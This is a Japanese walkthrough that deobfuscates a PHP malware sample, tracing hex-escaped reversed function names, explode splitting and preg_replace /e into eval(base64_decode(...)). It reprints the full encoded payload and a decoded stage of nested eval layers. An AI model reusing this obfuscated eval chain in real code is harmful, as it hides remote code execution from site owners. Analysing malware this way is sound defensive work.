Y3NGbWRsUkNJN2tDTXdnRE14c1NLb1VXYnBSSExwa2lJOTBFU2tobVV6TW1Jb1kwVUNaMlRKZFdZVXgyVFFobVROeFdZMlZHSzFRV2JzYzFVa2QyUWtWVldwVjBVdEZHYmhaWFprZ1NacHQyYnZOR2RsTkhRZ3NISWxOSGJsQlNmN0JTS3BrU1hYTkZabk5FWlZsVmFGTlZiaHhXWTJWR0piVlVTTDkwVEQ5RkpvUVhaek5YYW9BaWN2QlNLcE1rWmpkV1R3WlhhejFrY3NGbWRsUkNJc0lTYXZJQ0l1QVNLMEJGUm85MmNIUm5iRVJIVnNGbWRsUkNJc0lDZmlnU1prOUdidzFXYWc0Q0lpOGlJb2cyWTBGV2JmZFdaeUJIS29ZV2EiKGVkb2NlZF80NmVzYWIobGF2ZScpKTskZXZhbFVkQ1hURFFFUm1XbkRTID0xODc5Mjt9";

なにかをBASE64エンコードした文字列

//$eva1tYlbakBcVSir = "\x65\144\x6f\154\x70\170\x65";
 $eva1tYlbakBcVSir = "edolpxe";

16進を戻すと、「edolpxe」が出てくる。これは「explode」を逆転させたもの。

//$eva1tYldakBcVSir = "\x73\164\x72\162\x65\166";
 $eva1tYldakBcVSir = "strrev";

逆転した文字をもとに戻すための 「strrev」 関数が16進に変換してある。

//$eva1tYldakBoVS1r = "\x65\143\x61\154\x70\145\x72\137\x67\145\x72\160";
 $eva1tYldakBoVS1r = "ecalper_gerp";

これも16進を元に戻して逆転させると「preg_replace」になる。

//$eva1tYidokBoVSjr = "\x3b\51\x29\135\x31\133\x72\152\x53\126\x63\102\x6b\141\x64\151\x59\164\x31\141\x76\145\x24\50\x65\144\x6f\143\x65\144\x5f\64\x36\145\x73\141\x62\50\x6c\141\x76\145\x40\72\x65\166\x61\154\x28\42\x5c\61\x22\51\x3b\72\x40\50\x2e\53\x29\100\x69\145";
 $eva1tYidokBoVSjr = ';))]1[rjSVcBkadiYt1ave$(edoced_46esab(lave@:eval("\1");:@(.+)@ie';

これも16進を元に戻して逆転させると 「ei@)+.(@:;)”1\”(lave:@eval(base64_decode($eva1tYidakBcVSjr[1]));」という、preg_replaceに使うであろう後方部分が出てくる。一番最初の行に定義されているBASE64をデコードする部分も見える。

//$eva1tYldokBcVSjr=$eva1tYldakBcVSir($eva1tYldakBoVS1r);
 $eva1tYldokBcVSjr = strrev( "ecalper_gerp" );

この行で、先ほどの逆転16進文字を元に戻している。strrev( “ecalper_gerp” ) → preg_replace

//$eva1tYldakBcVSjr=$eva1tYldakBcVSir($eva1tYlbakBcVSir);
 $eva1tYldakBcVSjr = strrev( "edolpxe" );

この行で、先ほどの逆転16進文字を元に戻している。strrev( “edolpxe” ) → explode

//$eva1tYidakBcVSjr = $eva1tYldakBcVSjr(chr(2687.5*0.016), $eva1fYlbakBcVSir);
 $eva1tYidakBcVSjr = $eva1tYldakBcVSjr( '+', $eva1fYlbakBcVSir );

つまり $eva1tYidakBcVSjr = explode(‘+’,BASE64エンコード文字列);

explodeは第2引数の文字列を第1引数の文字で分割する関数です。つまり、1行目のBASE64文字列の途中に出てくる「+」の文字を境にして、文字列を分割することになります。
これをやると、

Array
 (
 [0] => 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
 [1] => aWYgKCFpc3NldCgkZXZhbFVkQ1hURFFFUm1XbkRTKSkge2Z1bmN0aW9uIGV2YWxsd2hWZklWbldQYlQoJHMpeyRlID0gIiI7IGZvciAoJGEgPSAwOyAkYSA8PSBzdHJsZW4oJHMpLTE7ICRhKysgKXskZSAuPSAkc3tzdHJsZW4oJHMpLSRhLTF9O31yZXR1cm4oJGUpO31ldmFsKGV2YWxsd2hWZklWbldQYlQoJzspKSI9QVNmN2t5YU5SbWJCUlhXdk5uUmpGVVdKeFdZMlZHSm9VR1p2TldaazlGTjJVMmNoSkdJdUpYZDBWbWM3QlNLcjFFWnVGRWRaOTJjR05XUVpsRWJoWlhaa2dpUlRKa1pQbDBaaFJGYlBCRmFPMUViaFpYWmc0MmJwUjNZdVZuWiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbGx3aFZmSVZuV1BiVCgnOykpIjdraUk5MEVTa2htVXpNbUlvWTBVQ1oyVEpkV1lVeDJUUWhtVE54V1kyVldQWE5GWm5ORVpWbFZhRk5WYmh4V1kyVkdKIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsbHdoVmZJVm5XUGJUKCc7KSkiN2tpSTkwVFFqQmpVSUZtSW9ZMFVDWjJUSmRXWVV4MlRRaG1UTnhXWTJWV1BYWlZjaFpsY3BWMlZVeFdZMlZHSiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbGx3aFZmSVZuV1BiVCgnOykpIjdraUk5UXpWaEpDS0dObFFtOVVTbkZHVnM5RVVvNVVUc0ZtZGwxalFtaEZSVmRFZGlWRlpDeFdZMlZHSiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbGx3aFZmSVZuV1BiVCgnOykpIj09d09wSVNQOUVWUzJSMlZKSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbDFUWlZwblJ1VjJRc0oyZFJ4V1kyVkdKIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsbHdoVmZJVm5XUGJUKCc7KSkiPXNUWHBJU1YxVWxVSVpFTVlObFZ3VWxWNVlVVlZKbFJUSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbHRsVUZabFVGTjFYazB6UW1OMlpOQm5kcE5YVHl4V1kyVkdKIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsbHdoVmZJVm5XUGJUKCc7KSkiPXNUS3BraWNxTmxWakYwYWhSR1daUlhNaFpYWmtnaWRsSm5jME5IS0dObFFtOVVTbkZHVnM5RVVvNVVUc0ZtZGxoQ2JoWlhaIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsbHdoVmZJVm5XUGJUKCc7KSkiPXNUS3BJU1A5YzJZc2hYYlpSblJ0VmxJb1kwVUNaMlRKZFdZVXgyVFFobVROeFdZMlZHSXNraUkwWTFSYVZuUlhkbElvWTBVQ1oyVEpkV1lVeDJUUWhtVE54V1kyVkdJc2tpSTlrRVdhSkRiSEZtYUtoVldtWjBWaEpDS0dObFFtOVVTbkZHVnM5RVVvNVVUc0ZtZGxCQ0xwSUNNNTBXVVA1a1ZVSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbEJDTHBJU1BCNTJZeGduTVZKQ0tHTmxRbTlVU25GR1ZzOUVVbzVVVHNGbWRsQkNMcElDYjRKalcybGpNU0pDS0dObFFtOVVTbkZHVnM5RVVvNVVUc0ZtZGxoU2VoSm5jaEJTUGdRSFVFaDJiemRFZHVSRWRVeFdZMlZHSiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbGx3aFZmSVZuV1BiVCgnOykpIj09d09wa2lJNVFIVkxwblVEdGtlUzVtWXNKbGJpWm5UeWdGTVdKaldtWjFSaUJuV0hGMVowMDJZeElGV2FsSGRJbEVjTmhrU3ZSVGJSMWtUeUlsU3NCRFZhWjBNaHBrU1ZSbFJrWmtZb3BGV2FkR055SUdjU05UVzFabGJhSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbGhDYmhaWFoiKGVkb2NlZF80NmVzYWIobGF2ZScpKTtldmFsKGV2YWxsd2hWZklWbldQYlQoJzspKSI9PXdPcGdDTWtSR0pnMERJWXBIUnloMVRJZDJTbnhXWTJWR0oiKGVkb2NlZF80NmVzYWIobGF2ZScpKTtldmFsKGV2YWxsd2hWZklWbldQYlQoJzspKSI9PVFmOXREYWpGRVRhdEdWQ1pGYjFGM1p6TjNjc0ZtZGxSQ0l2aDJZbHRUWHhzRmFqRkVUYXRHVkNaRmIxRjNaek4zY3NGbWRsUkNJOUFDYWpGRVRhdEdWQ1pGYjFGM1p6TjNjc0ZtZGxSQ0k3a0NhakZFVGF0R1ZDWkZiMUYzWnpOM2NzRm1kbFJDTGxWbGVHNVdaRHhtWTNGRmJoWlhaa2dTWms5R2J3aFhaZzBESW9OV1FNcDFhVUprVnNWWGNuTjNjenhXWTJWR0o3bFNLbFZsZUc1V1pEeG1ZM0ZGYmhaWFprd0NhakZFVGF0R1ZDWkZiMUYzWnpOM2NzRm1kbFJDS3lSM2N5UjNjb0FpWnB0VEtwMFZLaVVsVHhRVlM1WVVWVkpsUlRKQ0tHTmxRbTlVU25GR1ZzOUVVbzVVVHNGbWRsdGxVRlpsVUZOMVhrZ1NaazkyWXVWR2J5Vm5McElTT24xbVNpZ2lSVEprWlBsMFpoUkZiUEJGYU8xRWJoWlhadWt5UW1OMlpOQm5kcE5YVHl4V1kyVkdKb1VHWnZObWJseG1jMTVTS2lrVFN0cGtJb1kwVUNaMlRKZFdZVXgyVFFobVROeFdZMlZtTGRsaUk5a2tSU1ZrUndnbFJTRkRWT1oxYVZKQ0tHTmxRbTlVU25GR1ZzOUVVbzVVVHNGbWRsdGxVRlpsVUZOMVhrNFNLaTBETVVGbUlvWTBVQ1oyVEpkV1lVeDJUUWhtVE54V1kyVm1McElTUDRRMFlpZ2lSVEprWlBsMFpoUkZiUEJGYU8xRWJoWlhadWtpSXZKa2JNSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbDVpUW1oRlJWZEVkaVZGWkN4V1kyVkdKdWtpSTkwemRNSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbDVDVzZSa2NZOUVTbnQwWnNGbWRsUmlMcElTUDRrSFRpZ2lSVEprWlBsMFpoUkZiUEJGYU8xRWJoWlhadWtpSTkwelpQSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbDV5VldGWFlXSlhhbGRGVnNGbWRsUkNLdUpFVGpkVVNKOVVXeHRXU0MxVVJYeFdZMlZHSTlBQ2FqRkVUYXRHVkNaRmIxRjNaek4zY3NGbWRsUkNJN2tDTXdnRE14c1NLb1VXYnBSSExwa2lJOTBFU2tobVV6TW1Jb1kwVUNaMlRKZFdZVXgyVFFobVROeFdZMlZHSzFRV2JzYzFVa2QyUWtWVldwVjBVdEZHYmhaWFprZ1NacHQyYnZOR2RsTkhRZ3NISWxOSGJsQlNmN0JTS3BrU1hYTkZabk5FWlZsVmFGTlZiaHhXWTJWR0piVlVTTDkwVEQ5RkpvUVhaek5YYW9BaWN2QlNLcE1rWmpkV1R3WlhhejFrY3NGbWRsUkNJc0lTYXZJQ0l1QVNLMEJGUm85MmNIUm5iRVJIVnNGbWRsUkNJc0lDZmlnU1prOUdidzFXYWc0Q0lpOGlJb2cyWTBGV2JmZFdaeUJIS29ZV2EiKGVkb2NlZF80NmVzYWIobGF2ZScpKTskZXZhbFVkQ1hURFFFUm1XbkRTID0xODc5Mjt9
 )

上記のように、2つに分けることができました。

//$eva1tYXdakAcVSjr = $eva1tYidakBcVSjr[0.031*0.061];
 $eva1tYXdakAcVSjr = $eva1tYidakBcVSjr[0.001891];

一つ上の行のexplodeで分割した配列を取り出しますが、[0.001891]はint型に直すと[0]になりますので、先頭の7kyJ7kSKioDTWVWeRB3TiciL1UjcmRiLn….Jg0DI1UTayZGJが取り出されます。
実はこのコードは一見オトリのようで、表面上は何も実行される部分がないが、解析を進めると後に重要な役割を果たす。

//$eva1tYidokBcVSjr = $eva1tYldakBcVSjr(chr(3625*0.016), $eva1tYidokBoVSjr);
 $eva1tYidokBcVSjr = $eva1tYldakBcVSjr( ':', $eva1tYidokBoVSjr);

つまり、

 $eva1tYidokBcVSjr = explode(':',';))]1[rjSVcBkadiYt1ave$(edoced_46esab(lave@:eval("\1");:@(.+)@ie');

を実行している。
ここで、 : を境にして分割するので、

 Array
 (
 [0] => ;))]1[rjSVcBkadiYt1ave$(edoced_46esab(lave@
 [1] => eval("\1");
 [2] => @(.+)@ie
 )

の3つの配列が取り出される。

//$eva1tYldokBcVSjr($eva1tYidokBcVSjr[0.016*(7812.5*0.016)],$eva1tYidokBcVSjr[62.5*0.016],$eva1tYldakBcVSir($eva1tYidokBcVSjr[0.061*0.031]));
$eva1tYldokBcVSjr( $eva1tYidokBcVSjr[2], $eva1tYidokBcVSjr[1], strrev( $eva1tYidokBcVSjr[0.001891]) );

つまり、

preg_replace( "@(.+)@ie", 'eval("\1");', :@eval(base64_decode($eva1tYidakBcVSjr[1])); );

ということ。最初にBASE64文字列を+で分割した後方の[1]側がbase64デコードされることとなる。

ここで、base64_decode(BASE64文字列の+から後方部分) をすると、

if (!isset($evalUdCXTDQERmWnDS)) {function evallwhVfIVnWPbT($s){$e = ""; for ($a = 0; $a <= strlen($s)-1; $a++ ){$e .= $s{strlen($s)-$a-1};}return($e);}eval(evallwhVfIVnWPbT(';))"=ASf7kyaNRmbBRXWvNnRjFUWJxWY2VGJoUGZvNWZk9FN2U2chJGIuJXd0Vmc7BSKr1EZuFEdZ92cGNWQZlEbhZXZkgiRTJkZPl0ZhRFbPBFaO1EbhZXZg42bpR3YuVnZ"(edoced_46esab(lave'));eval(evallwhVfIVnWPbT(';))"7kiI90ESkhmUzMmIoY0UCZ2TJdWYUx2TQhmTNxWY2VWPXNFZnNEZVlVaFNVbhxWY2VGJ"(edoced_46esab(lave'));eval(evallwhVfIVnWPbT(';))"7kiI90TQjBjUIFmIoY0UCZ2TJdWYUx2TQhmTNxWY2VWPXZVchZlcpV2VUxWY2VGJ"(edoced_46esab(lave'));eval(evallwhVfIVnWPbT(';))"7kiI9QzVhJCKGNlQm9USnFGVs9EUo5UTsFmdl1jQmhFRVdEdiVFZCxWY2VGJ"(edoced_46esab(lave'));eval(evallwhVfIVnWPbT(';))"==wOpISP9EVS2R2VJJCKGNlQm9USnFGVs9EUo5UTsFmdl1TZVpnRuV2QsJ2dRxWY2VGJ"(edoced_46esab(lave'));eval(evallwhVfIVnWPbT(';))"=sTXpISV1UlUIZEMYNlVwUlV5YUVVJlRTJCKGNlQm9USnFGVs9EUo5UTsFmdltlUFZlUFN1Xk0zQmN2ZNBndpNXTyxWY2VGJ"(edoced_46esab(lave'));eval(evallwhVfIVnWPbT(';))"=sTKpkicqNlVjF0ahRGWZRXMhZXZkgidlJnc0NHKGNlQm9USnFGVs9EUo5UTsFmdlhCbhZXZ"(edoced_46esab(lave'));eval(evallwhVfIVnWPbT(';))"=sTKpISP9c2YshXbZRnRtVlIoY0UCZ2TJdWYUx2TQhmTNxWY2VGIskiI0Y1RaVnRXdlIoY0UCZ2TJdWYUx2TQhmTNxWY2VGIskiI9kEWaJDbHFmaKhVWmZ0VhJCKGNlQm9USnFGVs9EUo5UTsFmdlBCLpICM50WUP5kVUJCKGNlQm9USnFGVs9EUo5UTsFmdlBCLpISPB52YxgnMVJCKGNlQm9USnFGVs9EUo5UTsFmdlBCLpICb4JjW2ljMSJCKGNlQm9USnFGVs9EUo5UTsFmdlhSehJnchBSPgQHUEh2bzdEduREdUxWY2VGJ"(edoced_46esab(lave'));eval(evallwhVfIVnWPbT(';))"==wOpkiI5QHVLpnUDtkeS5mYsJlbiZnTygFMWJjWmZ1RiBnWHF1Z002YxIFWalHdIlEcNhkSvRTbR1kTyIlSsBDVaZ0MhpkSVRlRkZkYopFWadGNyIGcSNTW1ZlbaJCKGNlQm9USnFGVs9EUo5UTsFmdlhCbhZXZ"(edoced_46esab(lave'));eval(evallwhVfIVnWPbT(';))"==wOpgCMkRGJg0DIYpHRyh1TId2SnxWY2VGJ"(edoced_46esab(lave'));eval(evallwhVfIVnWPbT(';))"==Qf9tDajFETatGVCZFb1F3ZzN3csFmdlRCIvh2YltTXxsFajFETatGVCZFb1F3ZzN3csFmdlRCI9ACajFETatGVCZFb1F3ZzN3csFmdlRCI7kCajFETatGVCZFb1F3ZzN3csFmdlRCLlVleG5WZDxmY3FFbhZXZkgSZk9GbwhXZg0DIoNWQMp1aUJkVsVXcnN3czxWY2VGJ7lSKlVleG5WZDxmY3FFbhZXZkwCajFETatGVCZFb1F3ZzN3csFmdlRCKyR3cyR3coAiZptTKp0VKiUlTxQVS5YUVVJlRTJCKGNlQm9USnFGVs9EUo5UTsFmdltlUFZlUFN1XkgSZk92YuVGbyVnLpISOn1mSigiRTJkZPl0ZhRFbPBFaO1EbhZXZukyQmN2ZNBndpNXTyxWY2VGJoUGZvNmblxmc15SKikTStpkIoY0UCZ2TJdWYUx2TQhmTNxWY2VmLdliI9kkRSVkRwglRSFDVOZ1aVJCKGNlQm9USnFGVs9EUo5UTsFmdltlUFZlUFN1Xk4SKi0DMUFmIoY0UCZ2TJdWYUx2TQhmTNxWY2VmLpISP4Q0YigiRTJkZPl0ZhRFbPBFaO1EbhZXZukiIvJkbMJCKGNlQm9USnFGVs9EUo5UTsFmdl5iQmhFRVdEdiVFZCxWY2VGJukiI90zdMJCKGNlQm9USnFGVs9EUo5UTsFmdl5CW6RkcY9ESnt0ZsFmdlRiLpISP4kHTigiRTJkZPl0ZhRFbPBFaO1EbhZXZukiI90zZPJCKGNlQm9USnFGVs9EUo5UTsFmdl5yVWFXYWJXaldFVsFmdlRCKuJETjdUSJ9UWxtWSC1URXxWY2VGI9ACajFETatGVCZFb1F3ZzN3csFmdlRCI7kCMwgDMxsSKoUWbpRHLpkiI90ESkhmUzMmIoY0UCZ2TJdWYUx2TQhmTNxWY2VGK1QWbsc1Ukd2QkVVWpV0UtFGbhZXZkgSZpt2bvNGdlNHQgsHIlNHblBSf7BSKpkSXXNFZnNEZVlVaFNVbhxWY2VGJbVUSL90TD9FJoQXZzNXaoAicvBSKpMkZjdWTwZXaz1kcsFmdlRCIsISavICIuASK0BFRo92cHRnbERHVsFmdlRCIsICfigSZk9Gbw1Wag4CIi8iIog2Y0FWbfdWZyBHKoYWa"(edoced_46esab(lave'));$evalUdCXTDQERmWnDS =18792;}

という新しいPHPコードが出現する。evalでコレを評価(実行)している。
そしてこれより下の残りのコードはオトリで意味を持たない。

    $eva1tYldakBcVSir = "";

    //$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;
    $eva1tYldakBoVS1r = "edolpxe"."edolpxe";

    //$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;
    $eva1tYidokBoVSjr = "edolpxe";

    //$eva1tYldakBcVSir = "\x73\164\x72\x65\143\x72\160\164\x72";
    $eva1tYldakBcVSir = "strecrptr";

    //$eva1tYlbakBcVSir = "\x67\141\x6f\133\x70\170\x65";
    $eva1tYlbakBcVSir = "gao[pxe";

    //$eva1tYldakBoVS1r = "\x65\143\x72\160";
    $eva1tYldakBoVS1r = "ecrp";

    $eva1tYldakBcVSir = "";

    //$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;
    $eva1tYldakBoVS1r = "gao[pxe"."gao[pxe";

    //$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;
    $eva1tYidokBoVSjr = "gao[pxe";

}
?>

 

 

出力された肝心のコードの解析

 

if (!isset($evalUdCXTDQERmWnDS)) {

	function evallwhVfIVnWPbT($s){
		$e = "";
		for ($a = 0; $a <= strlen($s)-1; $a++ ){
			$e .= $s{strlen($s)-$a-1};
		}
		
		return($e);
	}
	
	eval(evallwhVfIVnWPbT(';))"=ASf7kyaNRmbBRXWvNnRjFUWJxWY2VGJoUGZvNWZk9FN2U2chJGIuJXd0Vmc7BSKr1EZuFEdZ92cGNWQZlEbhZXZkgiRTJkZPl0ZhRFbPBFaO1EbhZXZg42bpR3YuVnZ"(edoced_46esab(lave'));
	eval(evallwhVfIVnWPbT(';))"7kiI90ESkhmUzMmIoY0UCZ2TJdWYUx2TQhmTNxWY2VWPXNFZnNEZVlVaFNVbhxWY2VGJ"(edoced_46esab(lave'));
	eval(evallwhVfIVnWPbT(';))"7kiI90TQjBjUIFmIoY0UCZ2TJdWYUx2TQhmTNxWY2VWPXZVchZlcpV2VUxWY2VGJ"(edoced_46esab(lave'));
	eval(evallwhVfIVnWPbT(';))"7kiI9QzVhJCKGNlQm9USnFGVs9EUo5UTsFmdl1jQmhFRVdEdiVFZCxWY2VGJ"(edoced_46esab(lave'));
	eval(evallwhVfIVnWPbT(';))"==wOpISP9EVS2R2VJJCKGNlQm9USnFGVs9EUo5UTsFmdl1TZVpnRuV2QsJ2dRxWY2VGJ"(edoced_46esab(lave'));
	eval(evallwhVfIVnWPbT(';))"=sTXpISV1UlUIZEMYNlVwUlV5YUVVJlRTJCKGNlQm9USnFGVs9EUo5UTsFmdltlUFZlUFN1Xk0zQmN2ZNBndpNXTyxWY2VGJ"(edoced_46esab(lave'));
	eval(evallwhVfIVnWPbT(';))"=sTKpkicqNlVjF0ahRGWZRXMhZXZkgidlJnc0NHKGNlQm9USnFGVs9EUo5UTsFmdlhCbhZXZ"(edoced_46esab(lave'));
	eval(evallwhVfIVnWPbT(';))"=sTKpISP9c2YshXbZRnRtVlIoY0UCZ2TJdWYUx2TQhmTNxWY2VGIskiI0Y1RaVnRXdlIoY0UCZ2TJdWYUx2TQhmTNxWY2VGIskiI9kEWaJDbHFmaKhVWmZ0VhJCKGNlQm9USnFGVs9EUo5UTsFmdlBCLpICM50WUP5kVUJCKGNlQm9USnFGVs9EUo5UTsFmdlBCLpISPB52YxgnMVJCKGNlQm9USnFGVs9EUo5UTsFmdlBCLpICb4JjW2ljMSJCKGNlQm9USnFGVs9EUo5UTsFmdlhSehJnchBSPgQHUEh2bzdEduREdUxWY2VGJ"(edoced_46esab(lave'));
	eval(evallwhVfIVnWPbT(';))"==wOpkiI5QHVLpnUDtkeS5mYsJlbiZnTygFMWJjWmZ1RiBnWHF1Z002YxIFWalHdIlEcNhkSvRTbR1kTyIlSsBDVaZ0MhpkSVRlRkZkYopFWadGNyIGcSNTW1ZlbaJCKGNlQm9USnFGVs9EUo5UTsFmdlhCbhZXZ"(edoced_46esab(lave'));
	eval(evallwhVfIVnWPbT(';))"==wOpgCMkRGJg0DIYpHRyh1TId2SnxWY2VGJ"(edoced_46esab(lave'));
	eval(evallwhVfIVnWPbT(';))"==Qf9tDajFETatGVCZFb1F3ZzN3csFmdlRCIvh2YltTXxsFajFETatGVCZFb1F3ZzN3csFmdlRCI9ACajFETatGVCZFb1F3ZzN3csFmdlRCI7kCajFETatGVCZFb1F3ZzN3csFmdlRCLlVleG5WZDxmY3FFbhZXZkgSZk9GbwhXZg0DIoNWQMp1aUJkVsVXcnN3czxWY2VGJ7lSKlVleG5WZDxmY3FFbhZXZkwCajFETatGVCZFb1F3ZzN3csFmdlRCKyR3cyR3coAiZptTKp0VKiUlTxQVS5YUVVJlRTJCKGNlQm9USnFGVs9EUo5UTsFmdltlUFZlUFN1XkgSZk92YuVGbyVnLpISOn1mSigiRTJkZPl0ZhRFbPBFaO1EbhZXZukyQmN2ZNBndpNXTyxWY2VGJoUGZvNmblxmc15SKikTStpkIoY0UCZ2TJdWYUx2TQhmTNxWY2VmLdliI9kkRSVkRwglRSFDVOZ1aVJCKGNlQm9USnFGVs9EUo5UTsFmdltlUFZlUFN1Xk4SKi0DMUFmIoY0UCZ2TJdWYUx2TQhmTNxWY2VmLpISP4Q0YigiRTJkZPl0ZhRFbPBFaO1EbhZXZukiIvJkbMJCKGNlQm9USnFGVs9EUo5UTsFmdl5iQmhFRVdEdiVFZCxWY2VGJukiI90zdMJCKGNlQm9USnFGVs9EUo5U